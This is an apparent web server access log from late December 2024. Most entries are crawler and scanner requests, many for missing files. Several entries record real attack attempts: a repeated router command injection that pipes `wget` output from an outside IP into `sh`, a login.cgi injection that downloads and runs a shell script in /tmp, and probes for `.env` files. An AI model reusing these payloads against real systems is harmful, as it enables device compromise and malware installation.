156.59.198.136 - - [25/Dec/2024:16:07:04 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202110131103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.213 - - [25/Dec/2024:16:15:07 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [25/Dec/2024:16:21:08 +0100] "GET /ed-test.2web.at/stats/lang/awstats-et.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [25/Dec/2024:16:25:09 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/tm_create.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [25/Dec/2024:16:29:10 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/orderedlist.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [25/Dec/2024:16:41:14 +0100] "GET /renault.activities.at/htdocs/import/werbung.csv HTTP/1.0" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.220.1.144 - - [25/Dec/2024:16:46:39 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
95.214.53.248 - - [25/Dec/2024:16:50:23 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
114.35.68.175 - - [25/Dec/2024:17:06:43 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
147.185.133.123 - - [25/Dec/2024:17:08:04 +0100] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
141.98.11.155 - - [25/Dec/2024:17:15:27 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
185.191.126.213 - - [25/Dec/2024:17:21:05 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
31.220.1.144 - - [25/Dec/2024:17:23:49 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.135 - - [25/Dec/2024:17:28:57 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/remove.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [25/Dec/2024:17:32:58 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/input.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [25/Dec/2024:17:36:58 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/undo.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [25/Dec/2024:17:40:59 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/button.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [25/Dec/2024:17:44:59 +0100] "GET /renault.activities.at/htdocs/binaries/10277440.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.53.205 - - [25/Dec/2024:17:48:51 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
118.200.131.219 - - [25/Dec/2024:18:05:36 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.136 - - [25/Dec/2024:18:09:01 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202007071503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [25/Dec/2024:18:13:01 +0100] "GET /renault.activities.at/htdocs/activities/framework/KoolControls/KoolImageView/styles/silver/silver.xml HTTP/1.0" 404 337 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [25/Dec/2024:18:17:01 +0100] "GET /renault.activities.at/htdocs/binaries/10122735.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [25/Dec/2024:18:21:57 +0100] "GET /renault.activities.at/htdocs/activities/framework/webfx/javascript/flot/FAQ.md HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.220.1.144 - - [25/Dec/2024:18:33:03 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.136 - - [25/Dec/2024:18:35:51 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/unorderedlist.gif HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [25/Dec/2024:18:39:51 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/search.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.19.138.234 - - [25/Dec/2024:18:43:05 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [25/Dec/2024:18:43:52 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/date.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [25/Dec/2024:18:47:53 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/combobox.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [25/Dec/2024:18:51:54 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/indent.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [25/Dec/2024:18:55:54 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/block.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [25/Dec/2024:19:12:04 +0100] "GET /triadian/squid.jpg HTTP/1.0" 404 295 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [25/Dec/2024:19:15:56 +0100] "GET /renault.2web.at/htdocs/binaries/10126849.xls HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
91.238.181.35 - - [25/Dec/2024:19:17:19 +0100] "\x03" 400 383 "-" "-"
156.59.198.136 - - [25/Dec/2024:19:19:56 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/outdent.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [25/Dec/2024:19:23:57 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/neu.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [25/Dec/2024:19:27:57 +0100] "GET /ed-test.2web.at/stats/lang/awstats-lv.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
114.34.196.89 - - [25/Dec/2024:19:37:12 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
76.11.185.195 - - [25/Dec/2024:19:39:35 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you"
125.242.210.220 - - [25/Dec/2024:19:40:22 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.135 - - [25/Dec/2024:19:44:25 +0100] "GET /ed-test.2web.at/stats/lang/awstats-ar.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.41.206.24 - - [25/Dec/2024:19:45:22 +0100] "GET /env HTTP/1.1" 404 279 "-" "-"
156.59.198.136 - - [25/Dec/2024:19:53:03 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/hidden.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [25/Dec/2024:19:57:03 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/save.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [25/Dec/2024:20:04:19 +0100] "GET /ed-test.2web.at/stats/lang/awstats-al.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.155 - - [25/Dec/2024:20:04:53 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [25/Dec/2024:20:08:19 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202111291203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
167.94.146.49 - - [25/Dec/2024:20:13:07 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.146.49 - - [25/Dec/2024:20:13:11 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.49 - - [25/Dec/2024:20:13:11 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.49 - - [25/Dec/2024:20:13:11 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.49 - - [25/Dec/2024:20:13:11 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
95.214.53.205 - - [25/Dec/2024:20:16:44 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [25/Dec/2024:20:28:21 +0100] "GET /renault.activities.at/htdocs/binaries/10319304.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [25/Dec/2024:20:36:22 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202110201303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
220.134.152.32 - - [25/Dec/2024:20:42:32 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
2.136.71.215 - - [25/Dec/2024:20:50:07 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.135 - - [25/Dec/2024:20:50:12 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/open.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.220.1.144 - - [25/Dec/2024:20:55:40 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
185.16.39.175 - - [25/Dec/2024:20:59:08 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
185.16.39.175 - - [25/Dec/2024:21:05:45 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
95.214.55.74 - - [25/Dec/2024:21:05:49 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
2.125.176.237 - - [25/Dec/2024:21:22:43 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
31.220.1.144 - - [25/Dec/2024:21:29:43 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.135 - - [25/Dec/2024:21:35:34 +0100] "GET /renault.activities.at/htdocs/activities/gui/frames/phpinfo.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [25/Dec/2024:21:39:34 +0100] "GET /renault.activities.at/htdocs/activities/framework/webfx/javascript/color/img/pixel.gif HTTP/1.0" 404 333 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
65.108.79.171 - - [25/Dec/2024:21:45:20 +0100] "GET /robots.txt HTTP/1.1" 404 362 "-" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.108.79.171 - - [25/Dec/2024:21:45:20 +0100] "GET /robots.txt HTTP/1.1" 404 362 "-" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.108.79.171 - - [25/Dec/2024:21:45:20 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
156.59.198.136 - - [25/Dec/2024:21:55:10 +0100] "GET /renault.activities.at/htdocs/binaries/10267451.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.213 - - [25/Dec/2024:21:58:48 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [25/Dec/2024:22:00:24 +0100] "GET /ed-test.2web.at/stats/lang/awstats-es.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.213.187.122 - - [25/Dec/2024:22:02:23 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
156.59.198.136 - - [25/Dec/2024:22:04:24 +0100] "GET /ed-test.activities.at/stats/lang/awstats-bg.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.129.7.255 - - [25/Dec/2024:22:11:29 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
185.242.226.116 - - [25/Dec/2024:22:16:11 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "python-requests/2.26.0"
185.242.226.116 - - [25/Dec/2024:22:16:11 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0"
156.59.198.136 - - [25/Dec/2024:22:30:17 +0100] "GET /ed-test.2web.at/stats/lang/awstats-ko.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.220.1.144 - - [25/Dec/2024:22:39:38 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
15.204.37.31 - - [25/Dec/2024:22:49:58 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
156.59.198.135 - - [25/Dec/2024:22:55:53 +0100] "GET /ed-test.2web.at/stats/lang/awstats-br.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
135.148.63.210 - - [25/Dec/2024:22:56:57 +0100] "GET /favicon.ico HTTP/1.1" 404 356 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
95.214.53.248 - - [25/Dec/2024:23:04:55 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [25/Dec/2024:23:11:29 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/rgba16.png HTTP/1.0" 404 326 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [25/Dec/2024:23:15:58 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/config/toolbar%20quick%20mode.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [25/Dec/2024:23:19:59 +0100] "GET /ed-test.2web.at/stats/lang/awstats-de.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
18.217.8.45 - - [25/Dec/2024:23:25:01 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
95.214.53.205 - - [25/Dec/2024:23:46:42 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.53.205 - - [25/Dec/2024:23:52:29 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
95.214.53.205 - - [25/Dec/2024:23:52:29 +0100] "GET /logon.htm HTTP/1.1" 404 350 "-" "Hello World"
156.59.198.136 - - [25/Dec/2024:23:52:48 +0100] "GET /renault.activities.at/htdocs/binaries/10130826.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [25/Dec/2024:23:58:11 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108171703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.128.155.73 - - [26/Dec/2024:00:12:42 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
156.59.198.135 - - [26/Dec/2024:00:22:16 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104261503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [26/Dec/2024:00:26:16 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103150903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [26/Dec/2024:00:30:16 +0100] "GET /ed-test.2web.at/stats/lang/awstats-nn.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
116.33.68.222 - - [26/Dec/2024:00:31:32 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
31.220.1.144 - - [26/Dec/2024:00:34:21 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
47.237.115.100 - - [26/Dec/2024:00:35:15 +0100] "\x16\x03\x01" 400 383 "-" "-"
80.82.77.202 - - [26/Dec/2024:00:35:48 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.135 - - [26/Dec/2024:00:50:10 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109201503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [26/Dec/2024:00:54:16 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202007301303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.43 - - [26/Dec/2024:00:54:31 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
46.19.138.234 - - [26/Dec/2024:00:57:01 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"